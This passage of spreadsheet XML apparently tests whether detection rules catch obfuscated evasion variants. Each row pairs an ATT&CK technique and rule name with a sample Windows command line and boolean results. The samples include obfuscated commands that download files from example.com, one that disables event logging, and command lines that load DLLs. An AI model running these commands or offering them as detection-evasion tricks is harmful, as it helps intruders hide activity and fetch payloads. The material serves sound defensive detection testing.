          <t>powershell.exe -Command "$iwr_alias = 'I' + 'WR'; Invoke-Expression "$iwr_alias -Uri http://example.com/test.txt -OutFile C:\Temp\test.txt""</t>
        </is>
      </c>
      <c r="F3608" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3608" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3608" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3608" s="44" t="n"/>
      <c r="J3608" s="44" t="n"/>
      <c r="K3608" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3609" ht="15.75" customHeight="1" s="42">
      <c r="A3609" s="44" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B3609" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_trace_evasion</t>
        </is>
      </c>
      <c r="C3609" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity</t>
        </is>
      </c>
      <c r="D3609" s="44" t="inlineStr">
        <is>
          <t>a238b5d0-ce2d-4414-a676-7a531b3d13d6</t>
        </is>
      </c>
      <c r="E3609" s="44" t="inlineStr">
        <is>
          <t>wevtutil.exe "set-log" TEST-HOST /e:"false"</t>
        </is>
      </c>
      <c r="F3609" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3609" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3609" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3609" s="44" t="n"/>
      <c r="J3609" s="44" t="n"/>
      <c r="K3609" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3610" ht="15.75" customHeight="1" s="42">
      <c r="A3610" s="44" t="inlineStr">
        <is>
          <t>t1036.002</t>
        </is>
      </c>
      <c r="B3610" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_right_to_left_override</t>
        </is>
      </c>
      <c r="C3610" s="44" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Right-to-Left Override</t>
        </is>
      </c>
      <c r="D3610" s="44" t="inlineStr">
        <is>
          <t>ad691d92-15f2-4181-9aa4-723c74f9ddc3</t>
        </is>
      </c>
      <c r="E3610" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "set "R=‮" &amp;&amp; powershell.exe -Command "Write-Output 'TEST-HOST !R!'""</t>
        </is>
      </c>
      <c r="F3610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3610" s="44" t="n"/>
      <c r="J3610" s="44" t="n"/>
      <c r="K3610" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3611" ht="15.75" customHeight="1" s="42">
      <c r="A3611" s="44" t="inlineStr">
        <is>
          <t>t1222.001</t>
        </is>
      </c>
      <c r="B3611" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_takeown_recursive_own</t>
        </is>
      </c>
      <c r="C3611" s="44" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown</t>
        </is>
      </c>
      <c r="D3611" s="44" t="inlineStr">
        <is>
          <t>554601fb-9b71-4bcc-abf4-21a611be4fde</t>
        </is>
      </c>
      <c r="E3611" s="44" t="inlineStr">
        <is>
          <t>takeown.exe -f C:\Users\thaim\AppData\Local\Temp\T1222.001_takeown_folder -r</t>
        </is>
      </c>
      <c r="F3611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3611" s="44" t="n"/>
      <c r="J3611" s="44" t="n"/>
      <c r="K3611" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3612" ht="15.75" customHeight="1" s="42">
      <c r="A3612" s="44" t="inlineStr">
        <is>
          <t>t1564.006</t>
        </is>
      </c>
      <c r="B3612" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_execution</t>
        </is>
      </c>
      <c r="C3612" s="44" t="inlineStr">
        <is>
          <t>Virtualbox Driver Installation or Starting of VMs</t>
        </is>
      </c>
      <c r="D3612" s="44" t="inlineStr">
        <is>
          <t>bab049ca-7471-4828-9024-38279a4c04da</t>
        </is>
      </c>
      <c r="E3612" s="44" t="inlineStr">
        <is>
          <t>rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,^R^T^R^3^I^n^i^t"</t>
        </is>
      </c>
      <c r="F3612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3612" s="44" t="n"/>
      <c r="J3612" s="44" t="n"/>
      <c r="K3612" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3613" ht="15.75" customHeight="1" s="42">
      <c r="A3613" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3613" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_suspicious_cmdline</t>
        </is>
      </c>
      <c r="C3613" s="44" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3613" s="44" t="inlineStr">
        <is>
          <t>631b22a4-70f4-4e2f-9ea8-42f84d9df6d8</t>
        </is>
      </c>
      <c r="E3613" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe -AddIn^Root:C:\Users\Public\Addins</t>
        </is>
      </c>
      <c r="F3613" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3613" s="44" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution (631b22a4-70f4-4e2f-9ea8-42f84d9df6d8); Uncommon AddinUtil.EXE CommandLine Execution (4f2cd9b6-4a17-440f-bb2a-687abb65993a)</t>
        </is>
      </c>
      <c r="J3613" s="44" t="n"/>
      <c r="K3613" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3614" ht="15.75" customHeight="1" s="42">
      <c r="A3614" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3614" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_suspicious_cmdline</t>
        </is>
      </c>
      <c r="C3614" s="44" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3614" s="44" t="inlineStr">
        <is>
          <t>631b22a4-70f4-4e2f-9ea8-42f84d9df6d8</t>
        </is>
      </c>
      <c r="E3614" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe -AddInRoot:C:\Users\.\Public\Addins</t>
        </is>
      </c>
      <c r="F3614" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3614" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3614" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3614" s="44" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution (4f2cd9b6-4a17-440f-bb2a-687abb65993a)</t>
        </is>
      </c>
      <c r="J3614" s="44" t="n"/>
      <c r="K3614" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3615" ht="15.75" customHeight="1" s="42">
      <c r="A3615" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3615" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_uncommon_cmdline</t>
        </is>
      </c>
      <c r="C3615" s="44" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3615" s="44" t="inlineStr">
        <is>
          <t>4f2cd9b6-4a17-440f-bb2a-687abb65993a</t>
        </is>
      </c>
      <c r="E3615" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe -AddIn^Root:C:\Users\Public\Addins</t>
        </is>
      </c>
      <c r="F3615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3615" s="44" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution (631b22a4-70f4-4e2f-9ea8-42f84d9df6d8); Uncommon AddinUtil.EXE CommandLine Execution (4f2cd9b6-4a17-440f-bb2a-687abb65993a)</t>
        </is>
      </c>
      <c r="J3615" s="44" t="n"/>
      <c r="K3615" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3616" ht="15.75" customHeight="1" s="42">
      <c r="A3616" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3616" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_potential_abuse</t>
        </is>
      </c>
      <c r="C3616" s="44" t="inlineStr">
        <is>
          <t>AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D3616" s="44" t="inlineStr">
        <is>
          <t>7efd2c8d-8b18-45b7-947d-adfe9ed04f61</t>
        </is>
      </c>
      <c r="E3616" s="44" t="inlineStr">
        <is>
          <t>AgentExecutor.exe /powershell C:\Path\To\script.ps1 C:\Path\To\out.txt C:\Path\To\err.txt C:\Path\To\time.txt 60000 C:\Windows\System32 0 0</t>
        </is>
      </c>
      <c r="F3616" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3616" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3616" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3616" s="44" t="n"/>
      <c r="J3616" s="44" t="n"/>
      <c r="K3616" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3617" ht="15.75" customHeight="1" s="42">
      <c r="A3617" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3617" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_potential_abuse</t>
        </is>
      </c>
      <c r="C3617" s="44" t="inlineStr">
        <is>
          <t>AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D3617" s="44" t="inlineStr">
        <is>
          <t>7efd2c8d-8b18-45b7-947d-adfe9ed04f61</t>
        </is>
      </c>
      <c r="E3617" s="44" t="inlineStr">
        <is>
          <t>AgentExecutor.exe	-powershell C:\Path\To\script.ps1 C:\Path\To\out.txt C:\Path\To\err.txt C:\Path\To\time.txt 60000 C:\Windows\System32 0 0</t>
        </is>
      </c>
      <c r="F3617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3617" s="44" t="n"/>
      <c r="J3617" s="44" t="n"/>
      <c r="K3617" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3618" ht="15.75" customHeight="1" s="42">
      <c r="A3618" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3618" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_susp_usage</t>
        </is>
      </c>
      <c r="C3618" s="44" t="inlineStr">
        <is>
          <t>Suspicious AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D3618" s="44" t="inlineStr">
        <is>
          <t>c0b40568-b1e9-4b03-8d6c-b096da6da9ab</t>
        </is>
      </c>
      <c r="E3618" s="44" t="inlineStr">
        <is>
          <t>AgentExecutor.exe /powershell C:\Path\To\script.ps1 C:\Path\To\out.txt C:\Path\To\err.txt C:\Path\To\time.txt 60000 C:\Windows\System32 0 0</t>
        </is>
      </c>
      <c r="F3618" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3618" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3618" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3618" s="44" t="n"/>
      <c r="J3618" s="44" t="n"/>
      <c r="K3618" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3619" ht="15.75" customHeight="1" s="42">
      <c r="A3619" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3619" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_susp_usage</t>
        </is>
      </c>
      <c r="C3619" s="44" t="inlineStr">
        <is>
          <t>Suspicious AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D3619" s="44" t="inlineStr">
        <is>
          <t>c0b40568-b1e9-4b03-8d6c-b096da6da9ab</t>
        </is>
      </c>
      <c r="E3619" s="44" t="inlineStr">
        <is>
          <t>AgentExecutor.exe "-powershell" C:\Path\To\script.ps1 C:\Path\To\out.txt C:\Path\To\err.txt C:\Path\To\time.txt 60000 C:\Windows\System32 0 0</t>
        </is>
      </c>
      <c r="F3619" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3619" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3619" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3619" s="44" t="n"/>
      <c r="J3619" s="44" t="n"/>
      <c r="K3619" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3620" ht="15.75" customHeight="1" s="42">
      <c r="A3620" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3620" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_susp_usage</t>
        </is>
      </c>
      <c r="C3620" s="44" t="inlineStr">
        <is>
          <t>Suspicious AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D3620" s="44" t="inlineStr">
        <is>
          <t>c0b40568-b1e9-4b03-8d6c-b096da6da9ab</t>
        </is>
      </c>
      <c r="E3620" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c AgentExecutor.exe -p^owershell C:\Path\To\script.ps1 C:\Path\To\out.txt C:\Path\To\err.txt C:\Path\To\time.txt 60000 C:\Windows\System32 0 0</t>
        </is>
      </c>
      <c r="F3620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3620" s="44" t="n"/>
      <c r="J3620" s="44" t="n"/>
      <c r="K3620" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3621" ht="15.75" customHeight="1" s="42">
      <c r="A3621" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3621" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_susp_usage</t>
        </is>
      </c>
      <c r="C3621" s="44" t="inlineStr">
        <is>
          <t>Suspicious AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D3621" s="44" t="inlineStr">
        <is>
          <t>c0b40568-b1e9-4b03-8d6c-b096da6da9ab</t>
        </is>
      </c>
      <c r="E3621" s="44" t="inlineStr">
        <is>
          <t>AgentExecutor.exe	-powershell C:\Path\To\script.ps1 C:\Path\To\out.txt C:\Path\To\err.txt C:\Path\To\time.txt 60000 C:\Windows\System32 0 0</t>
        </is>
      </c>
      <c r="F3621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3621" s="44" t="n"/>
      <c r="J3621" s="44" t="n"/>
      <c r="K3621" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3622" ht="15.75" customHeight="1" s="42">
      <c r="A3622" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3622" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C3622" s="44" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3622" s="44" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E3622" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" /LoadDLL C:\Windows\System32\version.dll</t>
        </is>
      </c>
      <c r="F3622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3622" s="44" t="n"/>
      <c r="J3622" s="44" t="n"/>
      <c r="K3622" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3623" ht="15.75" customHeight="1" s="42">
      <c r="A3623" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3623" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C3623" s="44" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3623" s="44" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E3623" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" "-LoadDLL" C:\Windows\System32\version.dll</t>
        </is>
      </c>
      <c r="F3623" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3623" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3623" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3623" s="44" t="n"/>
      <c r="J3623" s="44" t="n"/>
      <c r="K3623" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3624" ht="15.75" customHeight="1" s="42">
      <c r="A3624" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3624" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C3624" s="44" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3624" s="44" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E3624" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Windows\SysWOW64\certoc.exe" -Loa^dDLL C:\Windows\System32\version.dll"</t>
        </is>
      </c>
      <c r="F3624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3624" s="44" t="n"/>
      <c r="J3624" s="44" t="n"/>
      <c r="K3624" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3625" ht="15.75" customHeight="1" s="42">
      <c r="A3625" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3625" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C3625" s="44" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3625" s="44" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E3625" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe"	-LoadDLL	C:\Windows\System32\version.dll</t>
        </is>
      </c>
      <c r="F3625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3625" s="44" t="n"/>
      <c r="J3625" s="44" t="n"/>
      <c r="K3625" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3626" ht="15.75" customHeight="1" s="42">
      <c r="A3626" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3626" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll_susp_locations</t>
        </is>
      </c>
      <c r="C3626" s="44" t="inlineStr">
        <is>
          <t>Suspicious DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3626" s="44" t="inlineStr">
        <is>
          <t>84232095-ecca-4015-b0d7-7726507ee793</t>
        </is>
      </c>
      <c r="E3626" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" /LoadDLL C:\Users\Public\TestLibrary.dll</t>
        </is>
      </c>
      <c r="F3626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3626" s="44" t="n"/>
      <c r="J3626" s="44" t="n"/>
      <c r="K3626" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3627" ht="15.75" customHeight="1" s="42">
      <c r="A3627" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3627" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll_susp_locations</t>
        </is>
      </c>
      <c r="C3627" s="44" t="inlineStr">
        <is>
          <t>Suspicious DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3627" s="44" t="inlineStr">
        <is>
          <t>84232095-ecca-4015-b0d7-7726507ee793</t>
        </is>
      </c>
      <c r="E3627" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" "-LoadDLL" C:\Users\Public\TestLibrary.dll</t>
        </is>
      </c>
      <c r="F3627" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3627" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3627" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3627" s="44" t="n"/>
      <c r="J3627" s="44" t="n"/>
      <c r="K3627" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3628" ht="15.75" customHeight="1" s="42">
      <c r="A3628" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3628" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll_susp_locations</t>
        </is>
      </c>
      <c r="C3628" s="44" t="inlineStr">
        <is>
          <t>Suspicious DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3628" s="44" t="inlineStr">
        <is>
          <t>84232095-ecca-4015-b0d7-7726507ee793</t>
        </is>
      </c>
      <c r="E3628" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Windows\SysWOW64\certoc.exe" -Loa^dDLL C:\Users\Public\TestLibrary.dll"</t>
        </is>
      </c>
      <c r="F3628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3628" s="44" t="n"/>
      <c r="J3628" s="44" t="n"/>
      <c r="K3628" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3629" ht="15.75" customHeight="1" s="42">
      <c r="A3629" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3629" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll_susp_locations</t>
        </is>
      </c>
      <c r="C3629" s="44" t="inlineStr">
        <is>
          <t>Suspicious DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3629" s="44" t="inlineStr">
        <is>
          <t>84232095-ecca-4015-b0d7-7726507ee793</t>
        </is>
      </c>
      <c r="E3629" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" -LoadDLL C:\Users\.\Public\TestLibrary.dll</t>
        </is>
      </c>
      <c r="F3629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3629" s="44" t="n"/>
      <c r="J3629" s="44" t="n"/>
      <c r="K3629" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3630" ht="15.75" customHeight="1" s="42">
      <c r="A3630" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3630" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C3630" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D3630" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E3630" s="44" t="inlineStr">
        <is>
          <t>devinit.exe -t msi-install  -i http://example.com/package.msi</t>
        </is>
      </c>
      <c r="F3630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3630" s="44" t="n"/>
      <c r="J3630" s="44" t="n"/>
      <c r="K3630" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3631" ht="15.75" customHeight="1" s="42">
      <c r="A3631" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3631" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C3631" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D3631" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E3631" s="44" t="inlineStr">
        <is>
          <t>devinit.exe -t msi-install -i "http"://example.com/package.msi</t>
        </is>
      </c>
      <c r="F3631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3631" s="44" t="n"/>
      <c r="J3631" s="44" t="n"/>
      <c r="K3631" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3632" ht="15.75" customHeight="1" s="42">
      <c r="A3632" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3632" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C3632" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D3632" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E3632" s="44" t="inlineStr">
        <is>
          <t>devinit.exe "-t" msi-install "-i" http://example.com/package.msi</t>
        </is>
      </c>
      <c r="F3632" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3632" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3632" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3632" s="44" t="n"/>
      <c r="J3632" s="44" t="n"/>
      <c r="K3632" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3633" ht="15.75" customHeight="1" s="42">
      <c r="A3633" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3633" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C3633" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D3633" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E3633" s="44" t="inlineStr">
        <is>
          <t>devinit.exe	-t	msi-install	-i	http://example.com/package.msi</t>
        </is>
      </c>
      <c r="F3633" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3633" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3633" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3633" s="44" t="n"/>
      <c r="J3633" s="44" t="n"/>
      <c r="K3633" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3634" ht="15.75" customHeight="1" s="42">
      <c r="A3634" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3634" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_ext</t>
        </is>
      </c>
      <c r="C3634" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D3634" s="44" t="inlineStr">
        <is>
          <t>1dde5376-a648-492e-9e54-4241dd9b0c7f</t>
        </is>
      </c>
      <c r="E3634" s="44" t="inlineStr">
        <is>
          <t>diskshadow.exe "-s" C:\Temp\script.dsh</t>
        </is>
      </c>
      <c r="F3634" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3634" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3634" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3634" s="44" t="n"/>
      <c r="J3634" s="44" t="n"/>
      <c r="K3634" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3635" ht="15.75" customHeight="1" s="42">
      <c r="A3635" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3635" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_ext</t>
        </is>
      </c>
      <c r="C3635" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Uncommon Script Extension Execution</t>
